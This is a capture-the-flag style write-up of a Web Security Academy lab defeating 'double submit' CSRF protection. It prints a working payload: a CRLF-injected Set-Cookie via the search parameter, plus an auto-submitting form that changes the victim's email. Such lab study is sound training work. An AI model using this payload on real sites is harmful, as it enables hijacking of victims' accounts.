LAB 6 - CSRF where token is duplicated in cookie¶
Initial instructions¶
This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.¶
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.¶
You can log in to your own account using the following credentials: wiener:peter¶
First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.
And I got the following request. If we change any of this values the csrf token won't be valid, so it has to match both csrf.
Now lets perform a search and we will see that this reflected in the cookie.
We can see that since the search function has no CSRF protection, I can use this to inject cookies into the victim user's browser.
So I used the following payload.
If we check in the following screenshot we added a new cookie with the value fake.
Now I will generate the CSRF PoC with my original request.
But I will replace this script block for the following.
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
This is my final payload that I will send to the victim.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0a21002604339a6f80a70399009d00e5.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacked@hacked.xyz" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>
<img src="https://0a21002604339a6f80a70399009d00e5.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>
Lets send it to the victim. This works because both values are fake, so as long they match both CSRF token will be valid.
